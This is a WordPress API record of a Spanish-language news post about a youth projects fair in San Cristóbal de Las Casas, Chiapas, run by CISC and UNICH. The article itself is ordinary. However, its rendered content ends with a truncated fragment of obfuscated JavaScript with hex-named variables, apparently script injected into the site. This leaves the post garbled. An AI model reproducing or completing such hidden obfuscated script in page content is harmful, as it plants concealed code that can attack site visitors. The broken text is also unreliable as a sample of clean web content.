{"id":4907,"date":"2022-09-08T02:09:28","date_gmt":"2022-09-08T02:09:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4907"},"modified":"2022-09-08T02:09:29","modified_gmt":"2022-09-08T02:09:29","slug":"inicia-feria-informativa-de-proyectos-juveniles","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4907","title":{"rendered":"Inicia Feria Informativa de Proyectos Juveniles"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG_20220907_093937-1024x768.jpg\" alt=\"\" class=\"wp-image-4908\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG_20220907_093937-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG_20220907_093937-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG_20220907_093937-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG_20220907_093937-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/IMG_20220907_093937-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Inicia Feria Informativa de Proyectos Juveniles, organizado por el Centro de Investigaci\u00f3n en Salud de Comit\u00e1n A. C (CISC) y la Universidad Intercultural de Chiapas (UNICH), en San Crist\u00f3bal el cual tiene como objetivo presentar los proyectos que tuvieron j\u00f3venes con el apoyo de La Fundaci\u00f3n W.K. Kellogg (WKKF)<\/p>\n\n\n\n<p>Al respecto, Imelda Mart\u00ednez Hern\u00e1ndez, representante legal del CISC, dijo que esta feria busca exponer a m\u00e1s j\u00f3venes estudiantes de la universidad, los proyectos elaborados por 16 grupos, que pretende promover el liderazgo juvenil y llevar proyectos de acci\u00f3n social a comunidades de los Altos de Chiapas.<\/p>\n\n\n\n<p>\u201cSe llevan a cabo paneles con los integrantes de los grupos juveniles, que ellos pueden compartir las experiencias que vivieron sobre su liderazgo juvenil, no necesariamente con la implementaci\u00f3n de acciones de su proyecto, sino como implementaron su liderazgo juvenil\u201d, mencion\u00f3.<\/p>\n\n\n\n<p>Revel\u00f3 que son 16 proyectos en los que participan 23 mujeres y 14 j\u00f3venes, quienes presentar\u00e1n este jueves sus trabajos y actividades que desarrollaron entre ellos enfocados a cultivos, proyectos con miel, de rescate de lenguas originarias, de plantaci\u00f3n de caf\u00e9, y quienes traen el mensaje de las comunidades de qu\u00e9 proyectos sostenibles necesitan.<\/p>\n\n\n\n<p>Rese\u00f1\u00f3 que el CISC realiz\u00f3 en el 2021, un diplomado, avalado por la UNICH, quienes despu\u00e9s de la formaci\u00f3n, participaron en una convocatoria abierta y sus proyectos evaluados en temas de proyectos juveniles, recibiendo un recurso semilla que busca sea autofinanciado conforme vaya creciendo.<\/p>\n\n\n\n<p>\u201cEs un recurso semilla porque es para iniciar este proyecto, y pueden generar proyectos sostenibles, nuevas semillas para volver a sembrar, a trav\u00e9s de la venta de hongos, tener un recurso para comprar y tener continuidad. Lo mismo pasa con las hortalizas\u201d, abund\u00f3.<\/p>\n\n\n\n<p>Mart\u00ednez Hern\u00e1ndez, remarc\u00f3 que en 4 meses los j\u00f3venes se retiran de las comunidades donde implementaron el proyecto, y la intenci\u00f3n es que las comunidades contin\u00faen con el acompa\u00f1amientos de los j\u00f3venes, pero si sigan generando.<\/p>\n\n\n\n<p>En la feria de este jueves indic\u00f3, estar\u00e1n presentes dependencias como la secretar\u00eda de desarrollo, IMPI, Secretaria de la juventud, y quienes se espera, muestren inter\u00e9s por los proyectos, y puedan continuar los proyectos en otras comunidades, implementados por los j\u00f3venes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Inicia Feria Informativa de Proyectos Juveniles, organizado por el Centro de Investigaci\u00f3n en Salud de Comit\u00e1n A. C (CISC) y la Universidad Intercultural de Chiapas (UNICH), en San Crist\u00f3bal el cual tiene como objetivo presentar los proyectos que tuvieron j\u00f3venes con el apoyo de La Fundaci\u00f3n W.K. Kellogg &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4908,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4907","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4907","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4907"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4907\/revisions"}],"predecessor-version":[{"id":4909,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4907\/revisions\/4909"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4908"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4907"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4907"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4907"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}